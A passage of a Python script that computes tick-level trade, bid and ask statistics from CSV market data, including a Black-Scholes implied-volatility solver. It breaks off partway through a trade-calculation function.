TradeVolumePriceWeighted\r\n global TradeTickVolume\r\n global TradeMinVolume\r\n global TradeMaxVolume\r\n global TradeCurrentSize\r\n global TradeTotalSize\r\n global TradeTotalValue\r\n global ValuePerTrade\r\n global TradeFrequency\r\n global BidCurrentPrice\r\n global BidTotalPrice\r\n global BidPriceVolumeWeighted\r\n global BidMinPrice\r\n global BidMaxPrice\r\n global BidTickPrice\r\n global BidVolumePriceWeighted\r\n global BidTickVolume\r\n global BidMinVolume\r\n global BidMaxVolume\r\n global BidCurrentSize\r\n global BidTotalSize\r\n global BidTotalValue\r\n global ValuePerBid\r\n global BidFrequency\r\n global AskCurrentPrice\r\n global AskTotalPrice\r\n global AskPriceVolumeWeighted\r\n global AskMinPrice\r\n global AskMaxPrice\r\n global AskTickPrice\r\n global AskVolumePriceWeighted\r\n global AskTickVolume\r\n global AskMinVolume\r\n global AskMaxVolume\r\n global AskCurrentSize\r\n global AskTotalSize\r\n global AskTotalValue\r\n global ValuePerAsk\r\n global AskFrequency\r\n global TradeTotalValueUpTick\r\n global TradeTotalValueDownTick\r\n global TradeTotalSizeUpTick\r\n global TradeTotalSizeDownTick\r\n global TradeTotalPriceUpTick\r\n global TradeTotalPriceDownTick\r\n global TradePriceVolumeWeightedUpTick\r\n global TradePriceVolumeWeightedDownTick\r\n global TradeFrequencyUpTick\r\n global TradeFrequencyDownTick\r\n global TradeMinPriceUpTick\r\n global TradeMinPriceDownTick\r\n global TradeMaxPriceUpTick\r\n global TradeMaxPriceDownTick\r\n global TradeVolumePriceWeightedUpTick\r\n global TradeVolumePriceWeightedDownTick\r\n global TradeTickVolumeUpTick\r\n global TradeTickVolumeDownTick\r\n global TradeMinVolumeUpTick\r\n global TradeMinVolumeDownTick\r\n global TradeMaxVolumeUpTick\r\n global TradeMaxVolumeDownTick\r\n global ValuePerTradeUpTick\r\n global ValuePerTradeDownTick\r\n global TradeOpenPriceUpTick\r\n global TradeClosePriceUpTick\r\n global TradeOpenPriceDownTick\r\n global TradeClosePriceDownTick\r\n global TradeCloseVolumeUpTick\r\n global TradeCloseVolumeDownTick\r\n global BidTotalValueUpTick\r\n global BidTotalValueDownTick\r\n global BidTotalSizeUpTick\r\n global BidTotalSizeDownTick\r\n global BidTotalPriceUpTick\r\n global BidTotalPriceDownTick\r\n global BidPriceVolumeWeightedUpTick\r\n global BidPriceVolumeWeightedDownTick\r\n global BidFrequencyUpTick\r\n global BidFrequencyDownTick\r\n global BidMinPriceUpTick\r\n global BidMinPriceDownTick\r\n global BidMaxPriceUpTick\r\n global BidMaxPriceDownTick\r\n global BidVolumePriceWeightedUpTick\r\n global BidVolumePriceWeightedDownTick\r\n global BidTickVolumeUpTick\r\n global BidTickVolumeDownTick\r\n global BidMinVolumeUpTick\r\n global BidMinVolumeDownTick\r\n global BidMaxVolumeUpTick\r\n global BidMaxVolumeDownTick\r\n global ValuePerBidUpTick\r\n global ValuePerBidDownTick\r\n global BidOpenPriceUpTick\r\n global BidClosePriceUpTick\r\n global BidOpenPriceDownTick\r\n global BidClosePriceDownTick\r\n global BidCloseVolumeUpTick\r\n global BidCloseVolumeDownTick\r\n global AskTotalValueUpTick\r\n global AskTotalValueDownTick\r\n global AskTotalSizeUpTick\r\n global AskTotalSizeDownTick\r\n global AskTotalPriceUpTick\r\n global AskTotalPriceDownTick\r\n global AskPriceVolumeWeightedUpTick\r\n global AskPriceVolumeWeightedDownTick\r\n global AskFrequencyUpTick\r\n global AskFrequencyDownTick\r\n global AskMinPriceUpTick\r\n global AskMinPriceDownTick\r\n global AskMaxPriceUpTick\r\n global AskMaxPriceDownTick\r\n global AskVolumePriceWeightedUpTick\r\n global AskVolumePriceWeightedDownTick\r\n global AskTickVolumeUpTick\r\n global AskTickVolumeDownTick\r\n global AskMinVolumeUpTick\r\n global AskMinVolumeDownTick\r\n global AskMaxVolumeUpTick\r\n global AskMaxVolumeDownTick\r\n global ValuePerAskUpTick\r\n global ValuePerAskDownTick\r\n global AskOpenPriceUpTick\r\n global AskClosePriceUpTick\r\n global AskOpenPriceDownTick\r\n global AskClosePriceDownTick\r\n global AskCloseVolumeUpTick\r\n global AskCloseVolumeDownTick\r\n global TradeUpStdDeviation\r\n global TradeDownStdDeviation\r\n global TradeUpMedian\r\n global TradeDownMedian\r\n global TradeUpProbability\r\n global TradeDownProbability\r\n global BidUpProbability\r\n global BidDownProbability\r\n global AskUpProbability\r\n global AskDownProbability\r\n TradePrice = 0\r\n BidPrice = 0\r\n AskPrice = 0\r\n TradeSize = 0\r\n BidSize = 0\r\n AskSize = 0\r\n TradeVolume = 0\r\n BidVolume = 0\r\n AskVolume = 0\r\n\r\n TradeUpPrice = [0]\r\n TradeUpVolume = [0]\r\n TradeDownPrice = [0]\r\n TradeDownVolume = [0]\r\n BidUpPrice = [0]\r\n BidUpVolume = [0]\r\n BidDownPrice = [0]\r\n BidDownVolume = [0]\r\n AskUpPrice = [0]\r\n AskUpVolume = [0]\r\n AskDownPrice = [0]\r\n AskDownVolume = [0]\r\n\r\n UpCutOff = 0.5\r\n DownCutOff = 0.5\r\n MedianUpCutOff = 0\r\n MedianDownCutOff = 0\r\n Open1 = 0\r\n Close = 0\r\n High = 0\r\n Low = 0\r\n Volume = 0\r\n TradeFrequency = 0\r\n TradeTotalPrice = 0\r\n TradeTotalSize = 0\r\n TradeTotalValue = 0\r\n TradeMaxPrice = 0\r\n TradeMinPrice = 0\r\n TradeMaxVolume = 0\r\n TradeMinVolume = 0\r\n TradeTickPrice = 0\r\n TradeTickVolume = 0\r\n TradeOpenPriceUpTick = 0\r\n TradeFrequencyUpTick = 0\r\n TradeTotalPriceUpTick = 0\r\n TradeTotalSizeUpTick = 0\r\n TradeTotalValueUpTick = 0\r\n TradeMaxPriceUpTick = 0\r\n TradeMinPriceUpTick = 0\r\n TradeMaxVolumeUpTick = 0\r\n TradeMinVolumeUpTick = 0\r\n TradeTickVolumeUpTick = 0\r\n TradeOpenPriceDownTick = 0\r\n TradeFrequencyDownTick = 0\r\n TradeTotalPriceDownTick = 0\r\n TradeTotalSizeDownTick = 0\r\n TradeTotalValueDownTick = 0\r\n TradeMaxPriceDownTick = 0\r\n TradeMinPriceDownTick = 0\r\n TradeMaxVolumeDownTick = 0\r\n TradeMinVolumeDownTick = 0\r\n TradeTickVolumeDownTick = 0\r\n BidFrequency = 0\r\n BidTotalPrice = 0\r\n BidTotalSize = 0\r\n BidTotalValue = 0\r\n BidMaxPrice = 0\r\n BidMinPrice = 0\r\n BidMaxVolume = 0\r\n BidMinVolume = 0\r\n BidTickPrice = 0\r\n BidTickVolume = 0\r\n BidOpenPriceUpTick = 0\r\n BidFrequencyUpTick = 0\r\n BidTotalPriceUpTick = 0\r\n BidTotalSizeUpTick = 0\r\n BidTotalValueUpTick = 0\r\n BidMaxPriceUpTick = 0\r\n BidMinPriceUpTick = 0\r\n BidMaxVolumeUpTick = 0\r\n BidMinVolumeUpTick = 0\r\n BidTickVolumeUpTick = 0\r\n BidOpenPriceDownTick = 0\r\n BidFrequencyDownTick = 0\r\n BidTotalPriceDownTick = 0\r\n BidTotalSizeDownTick = 0\r\n BidTotalValueDownTick = 0\r\n BidMaxPriceDownTick = 0\r\n BidMinPriceDownTick = 0\r\n BidMaxVolumeDownTick = 0\r\n BidMinVolumeDownTick = 0\r\n BidTickVolumeDownTick = 0\r\n AskFrequency = 0\r\n AskTotalPrice = 0\r\n AskTotalSize = 0\r\n AskTotalValue = 0\r\n AskMaxPrice = 0\r\n AskMinPrice = 0\r\n AskMaxVolume = 0\r\n AskMinVolume = 0\r\n AskTickPrice = 0\r\n AskTickVolume = 0\r\n AskOpenPriceUpTick = 0\r\n AskFrequencyUpTick = 0\r\n AskTotalPriceUpTick = 0\r\n AskTotalSizeUpTick = 0\r\n AskTotalValueUpTick = 0\r\n AskMaxPriceUpTick = 0\r\n AskMinPriceUpTick = 0\r\n AskMaxVolumeUpTick = 0\r\n AskMinVolumeUpTick = 0\r\n AskTickVolumeUpTick = 0\r\n AskOpenPriceDownTick = 0\r\n AskFrequencyDownTick = 0\r\n AskTotalPriceDownTick = 0\r\n AskTotalSizeDownTick = 0\r\n AskTotalValueDownTick = 0\r\n AskMaxPriceDownTick = 0\r\n AskMinPriceDownTick = 0\r\n AskMaxVolumeDownTick = 0\r\n AskMinVolumeDownTick = 0\r\n AskTickVolumeDownTick = 0\r\n TradePriceVolumeWeighted = 0\r\n TradeTotalPrice = 0\r\n TradeCurrentPrice = 0\r\n TradeMaxPrice = 0\r\n TradeMinPrice = 0\r\n TradeTickPrice = 0\r\n TradeVolumePriceWeighted = 0\r\n TradeTickVolume = 0\r\n TradeMinVolume = 0\r\n TradeMaxVolume = 0\r\n TradeCurrentSize = 0\r\n TradeTotalSize = 0\r\n TradeTotalValue = 0\r\n ValuePerTrade = 0\r\n TradeFrequency = 0\r\n BidCurrentPrice = 0\r\n BidTotalPrice = 0\r\n BidPriceVolumeWeighted = 0\r\n BidMinPrice = 0\r\n BidMaxPrice = 0\r\n BidTickPrice = 0\r\n BidVolumePriceWeighted = 0\r\n BidTickVolume = 0\r\n BidMinVolume = 0\r\n BidMaxVolume = 0\r\n BidCurrentSize = 0\r\n BidTotalSize = 0\r\n BidTotalValue = 0\r\n ValuePerBid = 0\r\n BidFrequency = 0\r\n AskCurrentPrice = 0\r\n AskTotalPrice = 0\r\n AskPriceVolumeWeighted = 0\r\n AskMinPrice = 0\r\n AskMaxPrice = 0\r\n AskTickPrice = 0\r\n AskVolumePriceWeighted = 0\r\n AskTickVolume = 0\r\n AskMinVolume = 0\r\n AskMaxVolume = 0\r\n AskCurrentSize = 0\r\n AskTotalSize = 0\r\n AskTotalValue = 0\r\n ValuePerAsk = 0\r\n AskFrequency = 0\r\n TradeTotalValueUpTick = 0\r\n TradeTotalValueDownTick = 0\r\n TradeTotalSizeUpTick = 0\r\n TradeTotalSizeDownTick = 0\r\n TradeTotalPriceUpTick = 0\r\n TradeTotalPriceDownTick = 0\r\n TradePriceVolumeWeightedUpTick = 0\r\n TradePriceVolumeWeightedDownTick = 0\r\n TradeFrequencyUpTick = 0\r\n TradeFrequencyDownTick = 0\r\n TradeMinPriceUpTick = 0\r\n TradeMinPriceDownTick = 0\r\n TradeMaxPriceUpTick = 0\r\n TradeMaxPriceDownTick = 0\r\n TradeVolumePriceWeightedUpTick = 0\r\n TradeVolumePriceWeightedDownTick = 0\r\n TradeTickVolumeUpTick = 0\r\n TradeTickVolumeDownTick = 0\r\n TradeMinVolumeUpTick = 0\r\n TradeMinVolumeDownTick = 0\r\n TradeMaxVolumeUpTick = 0\r\n TradeMaxVolumeDownTick = 0\r\n ValuePerTradeUpTick = 0\r\n ValuePerTradeDownTick = 0\r\n TradeOpenPriceUpTick = 0\r\n TradeClosePriceUpTick = 0\r\n TradeOpenPriceDownTick = 0\r\n TradeClosePriceDownTick = 0\r\n TradeCloseVolumeUpTick = 0\r\n TradeCloseVolumeDownTick = 0\r\n BidTotalValueUpTick = 0\r\n BidTotalValueDownTick = 0\r\n BidTotalSizeUpTick = 0\r\n BidTotalSizeDownTick = 0\r\n BidTotalPriceUpTick = 0\r\n BidTotalPriceDownTick = 0\r\n BidPriceVolumeWeightedUpTick = 0\r\n BidPriceVolumeWeightedDownTick = 0\r\n BidFrequencyUpTick = 0\r\n BidFrequencyDownTick = 0\r\n BidMinPriceUpTick = 0\r\n BidMinPriceDownTick = 0\r\n BidMaxPriceUpTick = 0\r\n BidMaxPriceDownTick = 0\r\n BidVolumePriceWeightedUpTick = 0\r\n BidVolumePriceWeightedDownTick = 0\r\n BidTickVolumeUpTick = 0\r\n BidTickVolumeDownTick = 0\r\n BidMinVolumeUpTick = 0\r\n BidMinVolumeDownTick = 0\r\n BidMaxVolumeUpTick = 0\r\n BidMaxVolumeDownTick = 0\r\n ValuePerBidUpTick = 0\r\n ValuePerBidDownTick = 0\r\n BidOpenPriceUpTick = 0\r\n BidClosePriceUpTick = 0\r\n BidOpenPriceDownTick = 0\r\n BidClosePriceDownTick = 0\r\n BidCloseVolumeUpTick = 0\r\n BidCloseVolumeDownTick = 0\r\n AskTotalValueUpTick = 0\r\n AskTotalValueDownTick = 0\r\n AskTotalSizeUpTick = 0\r\n AskTotalSizeDownTick = 0\r\n AskTotalPriceUpTick = 0\r\n AskTotalPriceDownTick = 0\r\n AskPriceVolumeWeightedUpTick = 0\r\n AskPriceVolumeWeightedDownTick = 0\r\n AskFrequencyUpTick = 0\r\n AskFrequencyDownTick = 0\r\n AskMinPriceUpTick = 0\r\n AskMinPriceDownTick = 0\r\n AskMaxPriceUpTick = 0\r\n AskMaxPriceDownTick = 0\r\n AskVolumePriceWeightedUpTick = 0\r\n AskVolumePriceWeightedDownTick = 0\r\n AskTickVolumeUpTick = 0\r\n AskTickVolumeDownTick = 0\r\n AskMinVolumeUpTick = 0\r\n AskMinVolumeDownTick = 0\r\n AskMaxVolumeUpTick = 0\r\n AskMaxVolumeDownTick = 0\r\n ValuePerAskUpTick = 0\r\n ValuePerAskDownTick = 0\r\n AskOpenPriceUpTick = 0\r\n AskClosePriceUpTick = 0\r\n AskOpenPriceDownTick = 0\r\n AskClosePriceDownTick = 0\r\n AskCloseVolumeUpTick = 0\r\n AskCloseVolumeDownTick = 0\r\n TradeUpStdDeviation = 0\r\n TradeDownStdDeviation = 0\r\n TradeUpMedian = 0\r\n TradeDownMedian = 0\r\n TradeUpProbability = 0\r\n TradeDownProbability = 0\r\n BidUpProbability = 0\r\n BidDownProbability = 0\r\n AskUpProbability = 0\r\n AskDownProbability = 0\r\n\r\n\r\ndef CSVtoPRMTR(key):\r\n # print('PRMTR Key :', key)\r\n data = list(csv.reader(open(key)))\r\n # print (data)\r\n return data\r\n\r\n\r\ndef IvOiCSVtoArray(key, stp):\r\n stpkey = 'Y:\\\\vulturespicks3tokyo\\\\Controllers\\\\STPKeys.csv'\r\n MatrixSTP = list(csv.reader(open(stpkey)))\r\n nRows = len(MatrixSTP)\r\n nColumns = len(MatrixSTP[0])\r\n rowindex = 0\r\n columnindex = 0\r\n for x in range(1, nRows):\r\n for y in range(0, nColumns):\r\n if (stp == str(MatrixSTP[x][y])):\r\n rowindex = x\r\n columnindex = y\r\n # print('rowindex', rowindex)\r\n data = list(csv.reader(open(key)))\r\n nRows = len(data)\r\n nColumns = len(data[0])\r\n Matrix = [[0 for x in range(nColumns)] for y in range(nRows)]\r\n for x in range(1, nRows):\r\n if (x == rowindex):\r\n for y in range(5, nColumns):\r\n try:\r\n lpart = float(data[x][y])\r\n except:\r\n lpart = 1 # set date as 1 as I dont need it\r\n Matrix[x][y] = lpart\r\n # print('Matrix', Matrix)\r\n rMatrix = [row[5:nColumns] for row in Matrix[rowindex:rowindex + 1]]\r\n return rMatrix[0]\r\n\r\n\r\ndef erfcc(x):\r\n \"\"\"Complementary error function.\"\"\"\r\n z = abs(x)\r\n t = 1. / (1. + 0.5 * z)\r\n r = t * exp(-z * z - 1.26551223 + t * (1.00002368 + t * (.37409196 +\r\n t * (.09678418 + t * (-.18628806 + t * (.27886807 +\r\n t * (\r\n -1.13520398 + t * (\r\n 1.48851587 + t * (\r\n -.82215223 +\r\n t * .17087277)))))))))\r\n if (x >= 0.):\r\n return r\r\n else:\r\n return 2. - r\r\n\r\n\r\ndef ncdf(x):\r\n return 1. - 0.5 * erfcc(x / (2 ** 0.5))\r\n\r\n\r\ndef implied_volatility(Matrix, optiontype, askbidtrade):\r\n if (askbidtrade == 'ask'): P = float(Matrix[4])\r\n if (askbidtrade == 'bid'): P = float(Matrix[3])\r\n if (askbidtrade == 'trade'): P = float(Matrix[8])\r\n S = float(Matrix[15])\r\n E = float(Matrix[0])\r\n T = float(Matrix[13]) / 365\r\n r = float(0.12)\r\n dVol = 0.00001\r\n epsilon = 0.00001\r\n maxIter = 50\r\n sigma = 0.2\r\n # print (P, S, E, T, r)\r\n try:\r\n i = 1\r\n while i < maxIter:\r\n\r\n d_1 = float(float((math.log(S / E) + (r + (sigma ** 2) / 2) * T)) / float((sigma * (math.sqrt(T)))))\r\n d_2 = float(float((math.log(S / E) + (r - (sigma ** 2) / 2) * T)) / float((sigma * (math.sqrt(T)))))\r\n # if (optiontype == 'Call'):P_implied = float(S*norm.cdf(d_1) - E*math.exp(-r*T)*norm.cdf(d_2))# for call\r\n # if (optiontype == 'Put'): P_implied = float(E*math.exp(-r*T)*norm.cdf(-d_2) - S*norm.cdf(-d_1)) # for put\r\n if (optiontype == 'Call'): P_implied = float(S * ncdf(d_1) - E * math.exp(-r * T) * ncdf(d_2)) # for call\r\n if (optiontype == 'Put'): P_implied = float(E * math.exp(-r * T) * ncdf(-d_2) - S * ncdf(-d_1)) # for put\r\n sigma = sigma - dVol\r\n sigma1 = sigma\r\n d_1 = float(float((math.log(S / E) + (r + (sigma ** 2) / 2) * T)) / float((sigma * (math.sqrt(T)))))\r\n d_2 = float(float((math.log(S / E) + (r - (sigma ** 2) / 2) * T)) / float((sigma * (math.sqrt(T)))))\r\n # if (optiontype == 'Call'): P_impliedT = float(S*norm.cdf(d_1) - E*math.exp(-r*T)*norm.cdf(d_2)) #for call\r\n # if (optiontype == 'Put'): P_impliedT = float(E*math.exp(-r*T)*norm.cdf(-d_2) - S*norm.cdf(-d_1)) # for put\r\n if (optiontype == 'Call'): P_impliedT = float(S * ncdf(d_1) - E * math.exp(-r * T) * ncdf(d_2)) # for call\r\n if (optiontype == 'Put'): P_impliedT = float(\r\n E * math.exp(-r * T) * ncdf(-d_2) - S * ncdf(-d_1)) # for put\r\n dx = (P_impliedT - P_implied) / dVol\r\n if (math.fabs(dx) < epsilon or i == maxIter):\r\n break\r\n sigma = sigma1 - (P - P_implied) / dx\r\n if (sigma < 0.05): sigma = 0.05\r\n if (sigma > 0.95): sigma = 0.95\r\n i = i + 1\r\n # print('P, P_impliedT',P, P_impliedT )\r\n # return sigma\r\n except Exception as e:\r\n sigma = 0.2\r\n return sigma\r\n\r\n\r\ndef TickCSVtoMatrix(key, LastDateTime):\r\n data = list(csv.reader(open(key)))\r\n nRows = len(data)\r\n nColumns = len(data[0])\r\n # print(\"newBodynRows: \", nRows)\r\n # print(\"newBodynColumns: \", nColumns)\r\n dcontrol = 0\r\n selectfrom = 0\r\n # print(\"nRows: \", nRows)\r\n Matrix = [[0 for x in range(nColumns)] for y in range(nRows)]\r\n for x in range(1, nRows):\r\n dte = data[x][0]\r\n tme = data[x][1]\r\n dtetme = dte + ' ' + tme\r\n dtetme = datetime.datetime.strptime(dtetme, '%m/%d/%Y %H:%M:%S')\r\n if (dtetme > LastDateTime):\r\n if (dcontrol == 0):\r\n dcontrol = 1\r\n selectfrom = x\r\n for y in range(2, nColumns):\r\n Matrix[x][y] = data[x][y]\r\n rMatrix = [row[2:8] for row in Matrix[selectfrom:x]]\r\n # print('rMatrix', rMatrix)\r\n return rMatrix\r\n\r\n\r\ndef computeHigh(current, high):\r\n if high < current or high == 0:\r\n high = current\r\n return high\r\n\r\n\r\ndef computeLow(current, low):\r\n if low > current or low == 0:\r\n low = current\r\n return low\r\n\r\n\r\ndef marketdynamic(data):\r\n global TradePrice\r\n global BidPrice\r\n global AskPrice\r\n global TradeSize\r\n global BidSize\r\n global AskSize\r\n global Open1\r\n global Close\r\n global High\r\n global Low\r\n global Volume\r\n try:\r\n nRows = len(data)\r\n # print('Data', data)\r\n nColumns = len(data[0])\r\n\r\n emptystr = ''\r\n for i in range(0, nRows):\r\n # print('Row of Data:', i)\r\n TradePrice = 0\r\n BidPrice = 0\r\n AskPrice = 0\r\n TradeSize = 0\r\n BidSize = 0\r\n AskSize = 0\r\n\r\n if (str(data[i][0]) == emptystr):\r\n tmp = 0\r\n else:\r\n # print('data', data[i][0] )\r\n TradePrice = float(data[i][0])\r\n TradeSize = float(data[i][1])\r\n if (str(data[i][2]) == emptystr):\r\n tmp = 0\r\n else:\r\n BidPrice = float(data[i][2])\r\n BidSize = float(data[i][3])\r\n if (str(data[i][2]) == emptystr):\r\n tmp = 0\r\n else:\r\n AskPrice = float(data[i][4])\r\n AskSize = float(data[i][5])\r\n TradeCalculation()\r\n BidCalculation()\r\n AskCalculation()\r\n\r\n TradeUpCalculation()\r\n TradeDownCalculation()\r\n BidUpCalculation()\r\n BidDownCalculation()\r\n AskUpCalculation()\r\n AskDownCalculation()\r\n Close = TradeCurrentPrice\r\n High = TradeMaxPrice\r\n Low = TradeMinPrice\r\n Volume = TradeVolumePriceWeighted\r\n mdarray = [Open1, TradePriceVolumeWeighted, TradeTotalPrice, Close, High, Low, TradeTickPrice, Volume,\r\n TradeTickVolume, TradeMinVolume, TradeMaxVolume, TradeCurrentSize, TradeTotalSize, TradeTotalValue,\r\n ValuePerTrade, TradeFrequency, BidCurrentPrice, BidTotalPrice, BidPriceVolumeWeighted, BidMinPrice,\r\n BidMaxPrice, BidTickPrice, BidVolumePriceWeighted, BidTickVolume, BidMinVolume, BidMaxVolume,\r\n BidCurrentSize, BidTotalSize, BidTotalValue, ValuePerBid, BidFrequency, AskCurrentPrice,\r\n AskTotalPrice, AskPriceVolumeWeighted, AskMinPrice, AskMaxPrice, AskTickPrice,\r\n AskVolumePriceWeighted, AskTickVolume, AskMinVolume, AskMaxVolume, AskCurrentSize, AskTotalSize,\r\n AskTotalValue, ValuePerAsk, AskFrequency, TradeTotalValueUpTick, TradeTotalValueDownTick,\r\n TradeTotalSizeUpTick, TradeTotalSizeDownTick, TradeTotalPriceUpTick, TradeTotalPriceDownTick,\r\n TradePriceVolumeWeightedUpTick, TradePriceVolumeWeightedDownTick, TradeFrequencyUpTick,\r\n TradeFrequencyDownTick, TradeMinPriceUpTick, TradeMinPriceDownTick, TradeMaxPriceUpTick,\r\n TradeMaxPriceDownTick, TradeVolumePriceWeightedUpTick, TradeVolumePriceWeightedDownTick,\r\n TradeTickVolumeUpTick, TradeTickVolumeDownTick, TradeMinVolumeUpTick, TradeMinVolumeDownTick,\r\n TradeMaxVolumeUpTick, TradeMaxVolumeDownTick, ValuePerTradeUpTick, ValuePerTradeDownTick,\r\n TradeOpenPriceUpTick, TradeClosePriceUpTick, TradeOpenPriceDownTick, TradeClosePriceDownTick,\r\n TradeCloseVolumeUpTick, TradeCloseVolumeDownTick, BidTotalValueUpTick, BidTotalValueDownTick,\r\n BidTotalSizeUpTick, BidTotalSizeDownTick, BidTotalPriceUpTick, BidTotalPriceDownTick,\r\n BidPriceVolumeWeightedUpTick, BidPriceVolumeWeightedDownTick, BidFrequencyUpTick,\r\n BidFrequencyDownTick, BidMinPriceUpTick, BidMinPriceDownTick, BidMaxPriceUpTick, BidMaxPriceDownTick,\r\n BidVolumePriceWeightedUpTick, BidVolumePriceWeightedDownTick, BidTickVolumeUpTick,\r\n BidTickVolumeDownTick, BidMinVolumeUpTick, BidMinVolumeDownTick, BidMaxVolumeUpTick,\r\n BidMaxVolumeDownTick, ValuePerBidUpTick, ValuePerBidDownTick, BidOpenPriceUpTick,\r\n BidClosePriceUpTick, BidOpenPriceDownTick, BidClosePriceDownTick, BidCloseVolumeUpTick,\r\n BidCloseVolumeDownTick, AskTotalValueUpTick, AskTotalValueDownTick, AskTotalSizeUpTick,\r\n AskTotalSizeDownTick, AskTotalPriceUpTick, AskTotalPriceDownTick, AskPriceVolumeWeightedUpTick,\r\n AskPriceVolumeWeightedDownTick, AskFrequencyUpTick, AskFrequencyDownTick, AskMinPriceUpTick,\r\n AskMinPriceDownTick, AskMaxPriceUpTick, AskMaxPriceDownTick, AskVolumePriceWeightedUpTick,\r\n AskVolumePriceWeightedDownTick, AskTickVolumeUpTick, AskTickVolumeDownTick, AskMinVolumeUpTick,\r\n AskMinVolumeDownTick, AskMaxVolumeUpTick, AskMaxVolumeDownTick, ValuePerAskUpTick,\r\n ValuePerAskDownTick, AskOpenPriceUpTick, AskClosePriceUpTick, AskOpenPriceDownTick,\r\n AskClosePriceDownTick, AskCloseVolumeUpTick, AskCloseVolumeDownTick, TradeUpStdDeviation,\r\n TradeDownStdDeviation, TradeUpMedian, TradeDownMedian, TradeUpProbability, TradeDownProbability]\r\n return mdarray\r\n except Exception as e:\r\n mdarray = [Open1, TradePriceVolumeWeighted, TradeTotalPrice, Close, High, Low, TradeTickPrice, Volume,\r\n TradeTickVolume, TradeMinVolume, TradeMaxVolume, TradeCurrentSize, TradeTotalSize, TradeTotalValue,\r\n ValuePerTrade, TradeFrequency, BidCurrentPrice, BidTotalPrice, BidPriceVolumeWeighted, BidMinPrice,\r\n BidMaxPrice, BidTickPrice, BidVolumePriceWeighted, BidTickVolume, BidMinVolume, BidMaxVolume,\r\n BidCurrentSize, BidTotalSize, BidTotalValue, ValuePerBid, BidFrequency, AskCurrentPrice,\r\n AskTotalPrice, AskPriceVolumeWeighted, AskMinPrice, AskMaxPrice, AskTickPrice,\r\n AskVolumePriceWeighted, AskTickVolume, AskMinVolume, AskMaxVolume, AskCurrentSize, AskTotalSize,\r\n AskTotalValue, ValuePerAsk, AskFrequency, TradeTotalValueUpTick, TradeTotalValueDownTick,\r\n TradeTotalSizeUpTick, TradeTotalSizeDownTick, TradeTotalPriceUpTick, TradeTotalPriceDownTick,\r\n TradePriceVolumeWeightedUpTick, TradePriceVolumeWeightedDownTick, TradeFrequencyUpTick,\r\n TradeFrequencyDownTick, TradeMinPriceUpTick, TradeMinPriceDownTick, TradeMaxPriceUpTick,\r\n TradeMaxPriceDownTick, TradeVolumePriceWeightedUpTick, TradeVolumePriceWeightedDownTick,\r\n TradeTickVolumeUpTick, TradeTickVolumeDownTick, TradeMinVolumeUpTick, TradeMinVolumeDownTick,\r\n TradeMaxVolumeUpTick, TradeMaxVolumeDownTick, ValuePerTradeUpTick, ValuePerTradeDownTick,\r\n TradeOpenPriceUpTick, TradeClosePriceUpTick, TradeOpenPriceDownTick, TradeClosePriceDownTick,\r\n TradeCloseVolumeUpTick, TradeCloseVolumeDownTick, BidTotalValueUpTick, BidTotalValueDownTick,\r\n BidTotalSizeUpTick, BidTotalSizeDownTick, BidTotalPriceUpTick, BidTotalPriceDownTick,\r\n BidPriceVolumeWeightedUpTick, BidPriceVolumeWeightedDownTick, BidFrequencyUpTick,\r\n BidFrequencyDownTick, BidMinPriceUpTick, BidMinPriceDownTick, BidMaxPriceUpTick, BidMaxPriceDownTick,\r\n BidVolumePriceWeightedUpTick, BidVolumePriceWeightedDownTick, BidTickVolumeUpTick,\r\n BidTickVolumeDownTick, BidMinVolumeUpTick, BidMinVolumeDownTick, BidMaxVolumeUpTick,\r\n BidMaxVolumeDownTick, ValuePerBidUpTick, ValuePerBidDownTick, BidOpenPriceUpTick,\r\n BidClosePriceUpTick, BidOpenPriceDownTick, BidClosePriceDownTick, BidCloseVolumeUpTick,\r\n BidCloseVolumeDownTick, AskTotalValueUpTick, AskTotalValueDownTick, AskTotalSizeUpTick,\r\n AskTotalSizeDownTick, AskTotalPriceUpTick, AskTotalPriceDownTick, AskPriceVolumeWeightedUpTick,\r\n AskPriceVolumeWeightedDownTick, AskFrequencyUpTick, AskFrequencyDownTick, AskMinPriceUpTick,\r\n AskMinPriceDownTick, AskMaxPriceUpTick, AskMaxPriceDownTick, AskVolumePriceWeightedUpTick,\r\n AskVolumePriceWeightedDownTick, AskTickVolumeUpTick, AskTickVolumeDownTick, AskMinVolumeUpTick,\r\n AskMinVolumeDownTick, AskMaxVolumeUpTick, AskMaxVolumeDownTick, ValuePerAskUpTick,\r\n ValuePerAskDownTick, AskOpenPriceUpTick, AskClosePriceUpTick, AskOpenPriceDownTick,\r\n AskClosePriceDownTick, AskCloseVolumeUpTick, AskCloseVolumeDownTick, TradeUpStdDeviation,\r\n TradeDownStdDeviation, TradeUpMedian, TradeDownMedian, TradeUpProbability, TradeDownProbability]\r\n return mdarray\r\n\r\n\r\ndef TradeCalculation():\r\n global TradePrice\r\n global TradeSize\r\n global Open1\r\n global AskCurrentPrice\r\n global BidCurrentPrice\r\n global TradeCurrentPrice\r\n global TradeTickPrice\r\n global AskBidMidPrice\r\n global TradeUpProbability\r\n global TradeUpPrice\r\n global TradeUpVolume\r\n global TradeDownProbability\r\n global TradeDownPrice\r\n global TradeDownVolume\r\n global TradeFrequency\r\n global TradeMinPrice\r\n global TradeMaxPrice\r\n global TradeTickVolume\r\n global TradeCurrentSize\r\n global TradeTotalValue\r\n global TradeTotalSize\r\n global TradeTotalPrice\r\n global TradePriceVolumeWeighted\r\n global TradeVolumePriceWeighted\r\n global TradeMinVolume\r\n global TradeMaxVolume\r\n global ValuePerTrade\r\n Up = True\r\n\r\n if TradeSize > 0:\r\n TradeVolume = TradeSize\r\n if TradePrice > 0:\r\n TradePrice = TradePrice\r\n AskBidMidPrice = (AskCurrentPrice + BidCurrentPrice) / 2\r\n if Open1 == 0:\r\n Open1 = TradePrice\r\n # region \"TradeTickPrice\"\r\n if TradeCurrentPrice >= 0:\r\n if TradePrice > TradeCurrentPrice:\r\n TradeTickPrice = TradeTickPrice + 1\r\n # 'TradePriceCalculationUpTick ''//beacause of Mean and Deviation\r\n if AskBidMidPrice > 0:\r\n TradeUpProbability = TradeUpProbability + (TradePrice / AskBidMidPrice)\r\n TradeUpPrice.append((TradePrice))\r\n TradeUpVolume.append((TradeVolume))\r\n\r\n Up = True\r\n elif TradePrice < TradeCurrentPrice:\r\n TradeTickPrice = TradeTickPrice - 1\r\n # 'TradePriceCalculationDownTick ''(, TradePrice, TradeVolume)\r\n TradeDownProbability = TradeDownProbability + (AskBidMidPrice / TradePrice)\r\n TradeDownPrice.append((TradePrice))\r\n TradeDownVolume.append((TradeVolume))\r\n\r\n Up = False\r\n elif Up == True:\r\n # 'TradePriceCalculationUpTick ''(, TradePrice, TradeVolume)\r\n if AskBidMidPrice > 0:\r\n TradeUpProbability = 